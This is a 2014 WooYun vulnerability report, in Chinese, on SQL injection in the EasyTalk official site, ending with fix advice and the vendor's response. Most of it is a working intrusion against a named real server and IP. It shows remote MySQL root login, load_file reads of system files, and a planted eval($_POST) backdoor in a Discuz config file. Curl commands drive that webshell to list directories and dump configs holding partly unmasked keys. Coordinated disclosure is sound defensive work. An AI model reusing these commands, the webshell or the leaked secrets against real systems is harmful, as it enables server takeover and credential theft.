EasyTalk官网主站sql注入(可沦陷服务器)

漏洞详情

披露状态:

2014-02-12: 细节已通知厂商并且等待厂商处理中
2014-02-12: 厂商已经确认,细节仅向厂商公开
2014-02-22: 细节向核心白帽子及相关领域专家公开
2014-03-04: 细节向普通白帽子公开
2014-03-14: 细节向实习白帽子公开
2014-03-29: 细节向公众公开

简要描述:

加强安全意识。。。。。。

详细说明:

qiufeng@ubuntu:/tmp$ ping www.nextsns.com
PING www.nextsns.com (58.49.57.112) 56(84) bytes of data.
64 bytes from 58.49.57.112: icmp_req=1 ttl=55 time=17.4 ms



http://www.nextsns.com:80/et/?hjoeson*

存在sql注入,可注出数据

mysql超级管理员密码泄露
root *4C5F36D8E964919[马赛克]687CF45CF4CD3A2C

可远程登陆,上cmd5得明文 yo********n3
mysql -uroot -h 58.49.57.112 -p

select load_file("/etc/passwd");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
mysql:x:500:500::/home/mysql:/sbin/nologin
www:x:501:501::/home/www:/sbin/nologin


select load_file("/etc/sysconfig/network-scripts/ifcfg-eth0")
DEVICE=eth0
BOOTPROTO=none
HWADDR=bc:ae:c5:5f:18:81
NM_CONTROLLED=yes
ONBOOT=yes
TYPE=Ethernet
UUID="542e47b5-9841-43c1-8656-a7bc17229a58"
IPADDR=58.49.57.112
NETMASK=255.255.255.128
DNS2=202.103.44.150
GATEWAY=58.49.57.1
DNS1=202.103.24.68
IPV6INIT=no
USERCTL=no


select load_file("/etc/sysconfig/network-scripts/ifcfg-eth1");
DEVICE=eth1
BOOTPROTO=dhcp
HWADDR=BC:AE:C5:5F:17:90
NM_CONTROLLED=yes
ONBOOT=no
TYPE=Ethernet
UUID="dd967db4-77f0-41f8-8c18-91b5bed1959d"
IPV6INIT=no
USERCTL=no

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| etCms |
| etauthsite |
| etbbs |
| etnew |
| etwiki |
| fengkuang |
| fkcxhbbs |
| mygame2 |
| mysql |
| pcgame |
| performance_schema |
| richman |
| richman2 |
| webxiaohua |
| xiaohua |
| xiaohuaweb |
| youxiqunbbs |
+--------------------+
18 rows in set (0.02 sec)



youxiqunbbs数据库,pre_ucenter_applications表可拿uc_key,对应discuz论坛地址bbs.youxiqun.com

uc_key在手,服务器我有(还是那该死的/config/config_ucenter.php)!!!

#1打印目录

服务器貌似不支持scandir函数,只能用老方法获取了

可修改opendir函数值,遍历服务器



curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';

打印/home
Array
(
[0] => .
[1] => ..
[2] => java
[3] => lost+found
[4] => mygame.tar.gz
[5] => mysql
[6] => richman.tar.gz
[7] => richman2.tar.gz
[8] => www
[9] => wwwlogs
[10] => xhmain.tar.gz
[11] => xiaohua.tar.gz
[12] => xiaohuadb.tar.gz
[13] => youxiqunbbs.tar.gz
[14] => youxiqunbbsdb.tar.gz
)

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/www");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';
打印/home/www
Array
(
[0] => .
[1] => ..
[2] => .pki
[3] => cxh.tar.gz
[4] => fkcxh
[5] => fkcxh1
[6] => fkcxhbbs
[7] => fkcxhbbs_ys
[8] => html5
[9] => nextsns.com
[10] => penfu
[11] => smile.zip
[12] => webxiaohua
[13] => youxiqunbbs
)

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/www/nextsns.com/download");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';
打印/home/www/nextsns.com/download
Array
(
[0] => .
[1] => ..
[2] => EasyTalk_Development_Guide.pdf
[3] => EasyTalk_X1.3.rar
[4] => EasyTalk_X1.4.rar
[5] => EasyTalk_X1.5.rar
[6] => EasyTalk_X1.6.rar
[7] => EasyTalk_X1.7.rar
[8] => EasyTalk_X1.8.rar
[9] => EasyTalk_X2.0.1.rar
[10] => EasyTalk_X2.0.2.rar
[11] => EasyTalk_X2.0.rar
[12] => EasyTalk_X2.1.zip
[13] => EasyTalk_X2.1_Beta2_20120813.zip
[14] => EasyTalk_X2.2.1.zip
[15] => EasyTalk_X2.2.2.zip
[16] => EasyTalk_X2.2.zip
[17] => EasyTalk_X2.3.zip
[18] => EasyTalk_X2.4.zip
[19] => EasyTalk_for_android_v1.0.apk
[20] => EasyTalk_for_ios_v1.0.ipa
[21] => EasyTalk_for_ios_v1.1.ipa
[22] => EasyTalk_manual.pdf
[23] => EasyTalk�����ĵ�.rar
[24] => EasyTalk�ֻ����ز��ĵ�.docx
[25] => EasyTalk���ݿ��ṹ.pdf
[26] => EasyTalk΢����ʹ���ֲ�.pdf
[27] => EasyTalkϵͳ�ṹ.pdf
[28] => easytalk_php_sdk_v1.0.zip
[29] => install_manual.rar
[30] => msyh.ttf
[31] => update_1.5.rar
[32] => update_1.5_20110517.rar
[33] => update_1.6.rar
[34] => update_1.7.rar
[35] => update_1.8.rar
[36] => update_2.0.1.rar
[37] => update_2.0.2.rar
[38] => update_2.0.rar
)





#2 敏感信息文件

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=print_r(file_get_contents("./config_ucenter.php"));'
<?php


define('UC_CONNECT', 'mysql');

define('UC_DBHOST', '127.0.0.1');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'yo[马赛克]3');
define('UC_DBNAME', 'youxiqunbbs');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`youxiqunbbs`.pre_ucenter_');
define('UC_DBCONNECT', 0);

define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'S2m9bcbfT4Ua[马赛克]AdTcxd0242g737dbe4kauaubn2pb');
define('UC_API', 'http://aaa');eval($_POST[QF]);//');
define('UC_APPID', '1');
define('UC_IP', '');
define('UC_PPP', 20);


curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=print_r(file_get_contents("./config_global.php"));'
<?php


$_config = array();

// ---------------------------- CONFIG DB ----------------------------- //
$_config['db']['1']['dbhost'] = '127.0.0.1';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'y[马赛克]3';
$_config['db']['1']['dbcharset'] = 'utf8';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'youxiqunbbs';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';
$_config['db']['slave'] = '';

// -------------------------- CONFIG MEMORY --------------------------- //
$_config['memory']['prefix'] = 'ayRtDS_';
$_config['memory']['redis']['server'] = '';
$_config['memory']['redis']['port'] = 6379;
$_config['memory']['redis']['pconnect'] = 1;
$_config['memory']['redis']['timeout'] = '0';
$_config['memory']['redis']['serializer'] = 1;
$_config['memory']['redis']['requirepass'] = '';
$_config['memory']['memcache']['server'] = '';
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 1;
$_config['memory']['xcache'] = 1;
$_config['memory']['eaccelerator'] = 1;
$_config['memory']['wincache'] = 1;

// -------------------------- CONFIG SERVER --------------------------- //
$_config['server']['id'] = 1;

// ------------------------- CONFIG DOWNLOAD -------------------------- //
$_config['download']['readmod'] = 2;
$_config['download']['xsendfile']['type'] = '0';
$_config['download']['xsendfile']['dir'] = '/down/';

// --------------------------- CONFIG CACHE --------------------------- //
$_config['cache']['type'] = 'sql';

// -------------------------- CONFIG OUTPUT --------------------------- //
$_config['output']['charset'] = 'utf-8';
$_config['output']['forceheader'] = 1;
$_config['output']['gzip'] = '0';
$_config['output']['tplrefresh'] = 1;
$_config['output']['language'] = 'zh_cn';
$_config['output']['staticurl'] = 'static/';
$_config['output']['ajaxvalidate'] = '0';
$_config['output']['iecompatible'] = '0';

// -------------------------- CONFIG COOKIE --------------------------- //
$_config['cookie']['cookiepre'] = 'F57B_';
$_config['cookie']['cookiedomain'] = '';
$_config['cookie']['cookiepath'] = '/';

// ------------------------- CONFIG SECURITY -------------------------- //
$_config['security']['authkey'] = 'd648ed1kHi0uJuZa';
$_config['security']['urlxssdefend'] = 1;
$_config['security']['attackevasive'] = '0';
$_config['security']['querysafe']['status'] = 1;
$_config['security']['querysafe']['dfunction']['0'] = 'load_file';
$_config['security']['querysafe']['dfunction']['1'] = 'hex';
$_config['security']['querysafe']['dfunction']['2'] = 'substring';
$_config['security']['querysafe']['dfunction']['3'] = 'if';
$_config['security']['querysafe']['dfunction']['4'] = 'ord';
$_config['security']['querysafe']['dfunction']['5'] = 'char';
$_config['security']['querysafe']['daction']['0'] = 'intooutfile';
$_config['security']['querysafe']['daction']['1'] = 'intodumpfile';
$_config['security']['querysafe']['daction']['2'] = 'unionselect';
$_config['security']['querysafe']['daction']['3'] = '(select';
$_config['security']['querysafe']['daction']['4'] = 'unionall';
$_config['security']['querysafe']['daction']['5'] = 'uniondistinct';
$_config['security']['querysafe']['daction']['6'] = 'uniondistinct';
$_config['security']['querysafe']['dnote']['0'] = '/*';
$_config['security']['querysafe']['dnote']['1'] = '*/';
$_config['security']['querysafe']['dnote']['2'] = '#';
$_config['security']['querysafe']['dnote']['3'] = '--';
$_config['security']['querysafe']['dnote']['4'] = '"';
$_config['security']['querysafe']['dlikehex'] = 1;
$_config['security']['querysafe']['afullnote'] = '0';

// -------------------------- CONFIG ADMINCP -------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
$_config['admincp']['founder'] = '1';
$_config['admincp']['forcesecques'] = '0';
$_config['admincp']['checkip'] = 1;
$_config['admincp']['runquery'] = '0';
$_config['admincp']['dbimport'] = 1;

// -------------------------- CONFIG REMOTE --------------------------- //
$_config['remote']['on'] = '0';
$_config['remote']['dir'] = 'remote';
$_config['remote']['appkey'] = '62cf0b3c3e6a4c9468e7216839721d8e';
$_config['remote']['cron'] = '0';

// --------------------------- CONFIG INPUT --------------------------- //
$_config['input']['compatible'] = 1;


// ------------------- THE END -------------------- //

?>

漏洞证明:

_829.png





11.jpg

修复方案:

1.对交互数据进行有效过滤

2.更新uc_key

3.建议关闭mysql对外网的访问权限

4.建议php应用不要直接使用root用户访问

5.EasyTalk源码建议托管到第三方,如google!

版权声明:转载请注明来源 秋风@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-02-12 17:03

厂商回复:

正在修复

最新状态:

暂无


漏洞评价: